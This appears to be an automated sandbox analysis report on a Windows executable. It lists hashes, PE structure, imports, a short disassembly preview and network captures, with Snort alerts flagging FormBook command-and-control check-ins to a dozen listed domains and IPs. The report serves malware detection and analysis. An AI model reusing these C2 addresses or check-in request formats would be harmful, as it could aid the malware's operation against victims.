                                                              SHA256:77abd0b0f20b0ca86c241acf5d5d60188362e75213f894b7bea82c8f75a3c1b1
                                                              SHA512:a84f50ca4ab7f2e7d29388dfc3ddd152437ad049a0b61d30462f0a2fcfbc21e0810bd5851bcae172c613eebf8c4c70c5073c3f641beca700acaa6d35582b3e25
                                                              SSDEEP:6144:wBlL/cqz/4YGOAWponolG63Sqjcj75Z6SMTKuazVY+xDh:CeqD4bOhonylilZnYKuaxY+xDh
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@

                                                              File Icon

                                                              Icon Hash:b2a88c96b2ca6a72

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x4030fb
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x56FF3A65 [Sat Apr 2 03:20:05 2016 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:b76363e9cb88bf9390860da8e50999d2

                                                              Entrypoint Preview

                                                              Instruction
                                                              sub esp, 00000184h
                                                              push ebx
                                                              push ebp
                                                              push esi
                                                              push edi
                                                              xor ebx, ebx
                                                              push 00008001h
                                                              mov dword ptr [esp+20h], ebx
                                                              mov dword ptr [esp+14h], 00409168h
                                                              mov dword ptr [esp+1Ch], ebx
                                                              mov byte ptr [esp+18h], 00000020h
                                                              call dword ptr [004070B0h]
                                                              call dword ptr [004070ACh]
                                                              cmp ax, 00000006h
                                                              je 00007F9238853FA3h
                                                              push ebx
                                                              call 00007F9238856D84h
                                                              cmp eax, ebx
                                                              je 00007F9238853F99h
                                                              push 00000C00h
                                                              call eax
                                                              mov esi, 00407280h
                                                              push esi
                                                              call 00007F9238856D00h
                                                              push esi
                                                              call dword ptr [00407108h]
                                                              lea esi, dword ptr [esi+eax+01h]
                                                              cmp byte ptr [esi], bl
                                                              jne 00007F9238853F7Dh
                                                              push 0000000Dh
                                                              call 00007F9238856D58h
                                                              push 0000000Bh
                                                              call 00007F9238856D51h
                                                              mov dword ptr [00423F44h], eax
                                                              call dword ptr [00407038h]
                                                              push ebx
                                                              call dword ptr [0040726Ch]
                                                              mov dword ptr [00423FF8h], eax
                                                              push ebx
                                                              lea eax, dword ptr [esp+38h]
                                                              push 00000160h
                                                              push eax
                                                              push ebx
                                                              push 0041F4F0h
                                                              call dword ptr [0040715Ch]
                                                              push 0040915Ch
                                                              push 00423740h
                                                              call 00007F9238856984h
                                                              call dword ptr [0040710Ch]
                                                              mov ebp, 0042A000h
                                                              push eax
                                                              push ebp
                                                              call 00007F9238856972h
                                                              push ebx
                                                              call dword ptr [00407144h]

                                                              Rich Headers

                                                              Programming Language:
                                                              • [EXP] VC++ 6.0 SP5 build 8804

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x74180xa0.rdata
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x2d0000x9e0.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x70000x27c.rdata
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x10000x5aeb0x5c00False0.665123980978data6.42230569414IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                              .rdata0x70000x11960x1200False0.458984375data5.20291736659IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .data0x90000x1b0380x600False0.432291666667data4.0475118296IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                              .ndata0x250000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .rsrc0x2d0000x9e00xa00False0.45625data4.50948350161IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                              Resources

                                                              NameRVASizeTypeLanguageCountry
                                                              RT_ICON0x2d1900x2e8dataEnglishUnited States
                                                              RT_DIALOG0x2d4780x100dataEnglishUnited States
                                                              RT_DIALOG0x2d5780x11cdataEnglishUnited States
                                                              RT_DIALOG0x2d6980x60dataEnglishUnited States
                                                              RT_GROUP_ICON0x2d6f80x14dataEnglishUnited States
                                                              RT_MANIFEST0x2d7100x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                              Imports

                                                              DLLImport
                                                              KERNEL32.dllGetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
                                                              USER32.dllSetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
                                                              GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                              SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
                                                              ADVAPI32.dllRegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                              COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                              ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                              Possible Origin

                                                              Language of compilation systemCountry where language is spokenMap
                                                              EnglishUnited States

                                                              Network Behavior

                                                              Snort IDS Alerts

                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                              10/27/21-16:20:06.775928TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975580192.168.2.551.210.240.92
                                                              10/27/21-16:20:06.775928TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975580192.168.2.551.210.240.92
                                                              10/27/21-16:20:06.775928TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975580192.168.2.551.210.240.92
                                                              10/27/21-16:20:27.846382TCP1201ATTACK-RESPONSES 403 Forbidden804979034.102.136.180192.168.2.5
                                                              10/27/21-16:20:38.101341TCP2031453ET TROJAN FormBook CnC Checkin (GET)4979180192.168.2.574.208.236.134
                                                              10/27/21-16:20:38.101341TCP2031449ET TROJAN FormBook CnC Checkin (GET)4979180192.168.2.574.208.236.134
                                                              10/27/21-16:20:38.101341TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979180192.168.2.574.208.236.134
                                                              10/27/21-16:20:54.027491TCP2031453ET TROJAN FormBook CnC Checkin (GET)4979880192.168.2.535.241.55.103
                                                              10/27/21-16:20:54.027491TCP2031449ET TROJAN FormBook CnC Checkin (GET)4979880192.168.2.535.241.55.103
                                                              10/27/21-16:20:54.027491TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979880192.168.2.535.241.55.103
                                                              10/27/21-16:21:04.615059TCP2031453ET TROJAN FormBook CnC Checkin (GET)4980080192.168.2.552.210.179.84
                                                              10/27/21-16:21:04.615059TCP2031449ET TROJAN FormBook CnC Checkin (GET)4980080192.168.2.552.210.179.84
                                                              10/27/21-16:21:04.615059TCP2031412ET TROJAN FormBook CnC Checkin (GET)4980080192.168.2.552.210.179.84
                                                              10/27/21-16:21:04.661230TCP1201ATTACK-RESPONSES 403 Forbidden804980052.210.179.84192.168.2.5

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Oct 27, 2021 16:20:06.749406099 CEST4975580192.168.2.551.210.240.92
                                                              Oct 27, 2021 16:20:06.775669098 CEST804975551.210.240.92192.168.2.5
                                                              Oct 27, 2021 16:20:06.775814056 CEST4975580192.168.2.551.210.240.92
                                                              Oct 27, 2021 16:20:06.775928020 CEST4975580192.168.2.551.210.240.92
                                                              Oct 27, 2021 16:20:06.802000046 CEST804975551.210.240.92192.168.2.5
                                                              Oct 27, 2021 16:20:06.802059889 CEST804975551.210.240.92192.168.2.5
                                                              Oct 27, 2021 16:20:06.802073002 CEST804975551.210.240.92192.168.2.5
                                                              Oct 27, 2021 16:20:06.802185059 CEST4975580192.168.2.551.210.240.92
                                                              Oct 27, 2021 16:20:06.802272081 CEST4975580192.168.2.551.210.240.92
                                                              Oct 27, 2021 16:20:06.829627991 CEST804975551.210.240.92192.168.2.5
                                                              Oct 27, 2021 16:20:27.707513094 CEST4979080192.168.2.534.102.136.180
                                                              Oct 27, 2021 16:20:27.726594925 CEST804979034.102.136.180192.168.2.5
                                                              Oct 27, 2021 16:20:27.729527950 CEST4979080192.168.2.534.102.136.180
                                                              Oct 27, 2021 16:20:27.729743958 CEST4979080192.168.2.534.102.136.180
                                                              Oct 27, 2021 16:20:27.748668909 CEST804979034.102.136.180192.168.2.5
                                                              Oct 27, 2021 16:20:27.846381903 CEST804979034.102.136.180192.168.2.5
                                                              Oct 27, 2021 16:20:27.846431017 CEST804979034.102.136.180192.168.2.5
                                                              Oct 27, 2021 16:20:27.846645117 CEST4979080192.168.2.534.102.136.180
                                                              Oct 27, 2021 16:20:27.846729040 CEST4979080192.168.2.534.102.136.180
                                                              Oct 27, 2021 16:20:27.865394115 CEST804979034.102.136.180192.168.2.5
                                                              Oct 27, 2021 16:20:37.961905956 CEST4979180192.168.2.574.208.236.134
                                                              Oct 27, 2021 16:20:38.100963116 CEST804979174.208.236.134192.168.2.5
                                                              Oct 27, 2021 16:20:38.101145983 CEST4979180192.168.2.574.208.236.134
                                                              Oct 27, 2021 16:20:38.101341009 CEST4979180192.168.2.574.208.236.134
                                                              Oct 27, 2021 16:20:38.240120888 CEST804979174.208.236.134192.168.2.5
                                                              Oct 27, 2021 16:20:38.245042086 CEST804979174.208.236.134192.168.2.5
                                                              Oct 27, 2021 16:20:38.245069981 CEST804979174.208.236.134192.168.2.5
                                                              Oct 27, 2021 16:20:38.245238066 CEST4979180192.168.2.574.208.236.134
                                                              Oct 27, 2021 16:20:38.245296001 CEST4979180192.168.2.574.208.236.134
                                                              Oct 27, 2021 16:20:38.384107113 CEST804979174.208.236.134192.168.2.5
                                                              Oct 27, 2021 16:20:43.290530920 CEST4979280192.168.2.5137.184.31.35
                                                              Oct 27, 2021 16:20:43.384162903 CEST8049792137.184.31.35192.168.2.5
                                                              Oct 27, 2021 16:20:43.386384964 CEST4979280192.168.2.5137.184.31.35
                                                              Oct 27, 2021 16:20:43.386756897 CEST4979280192.168.2.5137.184.31.35
                                                              Oct 27, 2021 16:20:43.479943037 CEST8049792137.184.31.35192.168.2.5
                                                              Oct 27, 2021 16:20:43.479991913 CEST8049792137.184.31.35192.168.2.5
                                                              Oct 27, 2021 16:20:43.480020046 CEST8049792137.184.31.35192.168.2.5
                                                              Oct 27, 2021 16:20:43.480144978 CEST4979280192.168.2.5137.184.31.35
                                                              Oct 27, 2021 16:20:43.480187893 CEST4979280192.168.2.5137.184.31.35
                                                              Oct 27, 2021 16:20:43.573841095 CEST8049792137.184.31.35192.168.2.5
                                                              Oct 27, 2021 16:20:48.524415016 CEST4979480192.168.2.53.67.234.155
                                                              Oct 27, 2021 16:20:48.543287992 CEST80497943.67.234.155192.168.2.5
                                                              Oct 27, 2021 16:20:48.543474913 CEST4979480192.168.2.53.67.234.155
                                                              Oct 27, 2021 16:20:48.543695927 CEST4979480192.168.2.53.67.234.155
                                                              Oct 27, 2021 16:20:48.562482119 CEST80497943.67.234.155192.168.2.5
                                                              Oct 27, 2021 16:20:48.563533068 CEST80497943.67.234.155192.168.2.5
                                                              Oct 27, 2021 16:20:48.563545942 CEST80497943.67.234.155192.168.2.5
                                                              Oct 27, 2021 16:20:48.563728094 CEST4979480192.168.2.53.67.234.155
                                                              Oct 27, 2021 16:20:48.563811064 CEST4979480192.168.2.53.67.234.155
                                                              Oct 27, 2021 16:20:48.582614899 CEST80497943.67.234.155192.168.2.5
                                                              Oct 27, 2021 16:20:54.008038044 CEST4979880192.168.2.535.241.55.103
                                                              Oct 27, 2021 16:20:54.026999950 CEST804979835.241.55.103192.168.2.5
                                                              Oct 27, 2021 16:20:54.027224064 CEST4979880192.168.2.535.241.55.103
                                                              Oct 27, 2021 16:20:54.027491093 CEST4979880192.168.2.535.241.55.103
                                                              Oct 27, 2021 16:20:54.046297073 CEST804979835.241.55.103192.168.2.5
                                                              Oct 27, 2021 16:20:54.332242012 CEST804979835.241.55.103192.168.2.5
                                                              Oct 27, 2021 16:20:54.332283020 CEST804979835.241.55.103192.168.2.5
                                                              Oct 27, 2021 16:20:54.332321882 CEST804979835.241.55.103192.168.2.5
                                                              Oct 27, 2021 16:20:54.332348108 CEST804979835.241.55.103192.168.2.5
                                                              Oct 27, 2021 16:20:54.332403898 CEST4979880192.168.2.535.241.55.103
                                                              Oct 27, 2021 16:20:54.332470894 CEST4979880192.168.2.535.241.55.103
                                                              Oct 27, 2021 16:20:54.332551003 CEST4979880192.168.2.535.241.55.103
                                                              Oct 27, 2021 16:20:54.346199036 CEST804979835.241.55.103192.168.2.5
                                                              Oct 27, 2021 16:20:54.346251965 CEST804979835.241.55.103192.168.2.5
                                                              Oct 27, 2021 16:20:54.346281052 CEST804979835.241.55.103192.168.2.5
                                                              Oct 27, 2021 16:20:54.346395969 CEST4979880192.168.2.535.241.55.103
                                                              Oct 27, 2021 16:20:54.346482992 CEST4979880192.168.2.535.241.55.103
                                                              Oct 27, 2021 16:20:54.346492052 CEST4979880192.168.2.535.241.55.103
                                                              Oct 27, 2021 16:20:54.351926088 CEST804979835.241.55.103192.168.2.5
                                                              Oct 27, 2021 16:20:54.352049112 CEST4979880192.168.2.535.241.55.103
                                                              Oct 27, 2021 16:20:59.367558956 CEST4979980192.168.2.5160.153.136.3
                                                              Oct 27, 2021 16:20:59.424536943 CEST8049799160.153.136.3192.168.2.5
                                                              Oct 27, 2021 16:20:59.425210953 CEST4979980192.168.2.5160.153.136.3
                                                              Oct 27, 2021 16:20:59.425259113 CEST4979980192.168.2.5160.153.136.3
                                                              Oct 27, 2021 16:20:59.478327990 CEST8049799160.153.136.3192.168.2.5
                                                              Oct 27, 2021 16:20:59.480664968 CEST8049799160.153.136.3192.168.2.5
                                                              Oct 27, 2021 16:20:59.480694056 CEST8049799160.153.136.3192.168.2.5
                                                              Oct 27, 2021 16:20:59.481018066 CEST4979980192.168.2.5160.153.136.3
                                                              Oct 27, 2021 16:20:59.481241941 CEST4979980192.168.2.5160.153.136.3
                                                              Oct 27, 2021 16:20:59.538345098 CEST8049799160.153.136.3192.168.2.5

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Oct 27, 2021 16:20:06.712508917 CEST6173353192.168.2.58.8.8.8
                                                              Oct 27, 2021 16:20:06.743684053 CEST53617338.8.8.8192.168.2.5
                                                              Oct 27, 2021 16:20:11.822491884 CEST5244153192.168.2.58.8.8.8
                                                              Oct 27, 2021 16:20:11.851373911 CEST53524418.8.8.8192.168.2.5
                                                              Oct 27, 2021 16:20:17.090502977 CEST6217653192.168.2.58.8.8.8
                                                              Oct 27, 2021 16:20:17.121787071 CEST53621768.8.8.8192.168.2.5
                                                              Oct 27, 2021 16:20:22.154433012 CEST6529653192.168.2.58.8.8.8
                                                              Oct 27, 2021 16:20:22.632325888 CEST53652968.8.8.8192.168.2.5
                                                              Oct 27, 2021 16:20:27.684767962 CEST6318353192.168.2.58.8.8.8
                                                              Oct 27, 2021 16:20:27.706388950 CEST53631838.8.8.8192.168.2.5
                                                              Oct 27, 2021 16:20:32.859416008 CEST6015153192.168.2.58.8.8.8
                                                              Oct 27, 2021 16:20:32.895567894 CEST53601518.8.8.8192.168.2.5
                                                              Oct 27, 2021 16:20:37.928250074 CEST5696953192.168.2.58.8.8.8
                                                              Oct 27, 2021 16:20:37.960422039 CEST53569698.8.8.8192.168.2.5
                                                              Oct 27, 2021 16:20:43.266113997 CEST5516153192.168.2.58.8.8.8
                                                              Oct 27, 2021 16:20:43.288822889 CEST53551618.8.8.8192.168.2.5
                                                              Oct 27, 2021 16:20:48.498081923 CEST4999253192.168.2.58.8.8.8
                                                              Oct 27, 2021 16:20:48.522423029 CEST53499928.8.8.8192.168.2.5
                                                              Oct 27, 2021 16:20:53.596335888 CEST5501653192.168.2.58.8.8.8
                                                              Oct 27, 2021 16:20:54.006380081 CEST53550168.8.8.8192.168.2.5
                                                              Oct 27, 2021 16:20:59.343343973 CEST6434553192.168.2.58.8.8.8
                                                              Oct 27, 2021 16:20:59.366530895 CEST53643458.8.8.8192.168.2.5
                                                              Oct 27, 2021 16:21:04.495866060 CEST5712853192.168.2.58.8.8.8
                                                              Oct 27, 2021 16:21:04.568428993 CEST53571288.8.8.8192.168.2.5
                                                              Oct 27, 2021 16:21:09.669536114 CEST5479153192.168.2.58.8.8.8
                                                              Oct 27, 2021 16:21:09.724406958 CEST53547918.8.8.8192.168.2.5

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                              Oct 27, 2021 16:20:06.712508917 CEST192.168.2.58.8.8.80xf370Standard query (0)www.salvationshippingsecurity.comA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:11.822491884 CEST192.168.2.58.8.8.80xc99cStandard query (0)www.mykombuchafactory.comA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:17.090502977 CEST192.168.2.58.8.8.80xf357Standard query (0)www.christinegagnonjewellery.comA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:22.154433012 CEST192.168.2.58.8.8.80xbd03Standard query (0)www.umgaleloacademy.comA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:27.684767962 CEST192.168.2.58.8.8.80x94b1Standard query (0)www.heyunshangcheng.infoA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:32.859416008 CEST192.168.2.58.8.8.80x88d5Standard query (0)www.sfcn-dng.comA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:37.928250074 CEST192.168.2.58.8.8.80x6bStandard query (0)www.crisisinterventionadvocates.comA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:43.266113997 CEST192.168.2.58.8.8.80xca7bStandard query (0)www.srchwithus.onlineA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:48.498081923 CEST192.168.2.58.8.8.80xc27eStandard query (0)www.itskosi.comA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:53.596335888 CEST192.168.2.58.8.8.80xefeeStandard query (0)www.sejiw3.xyzA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:59.343343973 CEST192.168.2.58.8.8.80xd5c3Standard query (0)www.hanansalman.comA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:21:04.495866060 CEST192.168.2.58.8.8.80x9355Standard query (0)www.rbrituelbeaute.comA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:21:09.669536114 CEST192.168.2.58.8.8.80xdf24Standard query (0)www.pronogtiki.storeA (IP address)IN (0x0001)

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                              Oct 27, 2021 16:20:06.743684053 CEST8.8.8.8192.168.2.50xf370No error (0)www.salvationshippingsecurity.comsalvationshippingsecurity.comCNAME (Canonical name)IN (0x0001)
                                                              Oct 27, 2021 16:20:06.743684053 CEST8.8.8.8192.168.2.50xf370No error (0)salvationshippingsecurity.com51.210.240.92A (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:11.851373911 CEST8.8.8.8192.168.2.50xc99cName error (3)www.mykombuchafactory.comnonenoneA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:17.121787071 CEST8.8.8.8192.168.2.50xf357Name error (3)www.christinegagnonjewellery.comnonenoneA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:22.632325888 CEST8.8.8.8192.168.2.50xbd03Server failure (2)www.umgaleloacademy.comnonenoneA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:27.706388950 CEST8.8.8.8192.168.2.50x94b1No error (0)www.heyunshangcheng.infoheyunshangcheng.infoCNAME (Canonical name)IN (0x0001)
                                                              Oct 27, 2021 16:20:27.706388950 CEST8.8.8.8192.168.2.50x94b1No error (0)heyunshangcheng.info34.102.136.180A (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:32.895567894 CEST8.8.8.8192.168.2.50x88d5Name error (3)www.sfcn-dng.comnonenoneA (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:37.960422039 CEST8.8.8.8192.168.2.50x6bNo error (0)www.crisisinterventionadvocates.com74.208.236.134A (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:43.288822889 CEST8.8.8.8192.168.2.50xca7bNo error (0)www.srchwithus.onlinesrchwithus.onlineCNAME (Canonical name)IN (0x0001)
                                                              Oct 27, 2021 16:20:43.288822889 CEST8.8.8.8192.168.2.50xca7bNo error (0)srchwithus.online137.184.31.35A (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:48.522423029 CEST8.8.8.8192.168.2.50xc27eNo error (0)www.itskosi.com3.67.234.155A (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:48.522423029 CEST8.8.8.8192.168.2.50xc27eNo error (0)www.itskosi.com3.67.153.12A (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:54.006380081 CEST8.8.8.8192.168.2.50xefeeNo error (0)www.sejiw3.xyz35.241.55.103A (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:20:59.366530895 CEST8.8.8.8192.168.2.50xd5c3No error (0)www.hanansalman.comhanansalman.comCNAME (Canonical name)IN (0x0001)
                                                              Oct 27, 2021 16:20:59.366530895 CEST8.8.8.8192.168.2.50xd5c3No error (0)hanansalman.com160.153.136.3A (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:21:04.568428993 CEST8.8.8.8192.168.2.50x9355No error (0)www.rbrituelbeaute.comweb.jimdosite.comCNAME (Canonical name)IN (0x0001)
                                                              Oct 27, 2021 16:21:04.568428993 CEST8.8.8.8192.168.2.50x9355No error (0)web.jimdosite.comdolphin-renderserve-prod.jimdo-platform.netCNAME (Canonical name)IN (0x0001)
                                                              Oct 27, 2021 16:21:04.568428993 CEST8.8.8.8192.168.2.50x9355No error (0)dolphin-renderserve-prod.jimdo-platform.netdolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                              Oct 27, 2021 16:21:04.568428993 CEST8.8.8.8192.168.2.50x9355No error (0)dolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.com52.210.179.84A (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:21:04.568428993 CEST8.8.8.8192.168.2.50x9355No error (0)dolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.com52.214.190.156A (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:21:04.568428993 CEST8.8.8.8192.168.2.50x9355No error (0)dolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.com52.209.227.237A (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:21:04.568428993 CEST8.8.8.8192.168.2.50x9355No error (0)dolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.com52.212.67.61A (IP address)IN (0x0001)
                                                              Oct 27, 2021 16:21:09.724406958 CEST8.8.8.8192.168.2.50xdf24No error (0)www.pronogtiki.store5.101.153.216A (IP address)IN (0x0001)

                                                              HTTP Request Dependency Graph

                                                              • www.salvationshippingsecurity.com
                                                              • www.heyunshangcheng.info
                                                              • www.crisisinterventionadvocates.com
                                                              • www.srchwithus.online
                                                              • www.itskosi.com
                                                              • www.sejiw3.xyz
                                                              • www.hanansalman.com

                                                              HTTP Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              0192.168.2.54975551.210.240.9280C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Oct 27, 2021 16:20:06.775928020 CEST1395OUTGET /u9xn/?EvGDLnJ=eYxsMd5wljUn1Fg6115NyaMNAPOWoN8Xbg1oh/XArMcWaLbikdCkMKkIXUVVkDc1SuQ5&5j=0BKPgh7X4n HTTP/1.1
                                                              Host: www.salvationshippingsecurity.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Oct 27, 2021 16:20:06.802059889 CEST1396INHTTP/1.1 301 Moved Permanently
                                                              Server: nginx
                                                              Date: Wed, 27 Oct 2021 14:20:06 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 162
                                                              Connection: close
                                                              Location: https://www.salvationshippingsecurity.com/u9xn/?EvGDLnJ=eYxsMd5wljUn1Fg6115NyaMNAPOWoN8Xbg1oh/XArMcWaLbikdCkMKkIXUVVkDc1SuQ5&5j=0BKPgh7X4n
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              1192.168.2.54979034.102.136.18080C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Oct 27, 2021 16:20:27.729743958 CEST9249OUTGET /u9xn/?EvGDLnJ=RrR08BH4oIo+gx361vOF46QRRg434M3aJQMobyGncW6ZpM1n/iVBy8ajhiKV3UdnqaZn&5j=0BKPgh7X4n HTTP/1.1
                                                              Host: www.heyunshangcheng.info
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
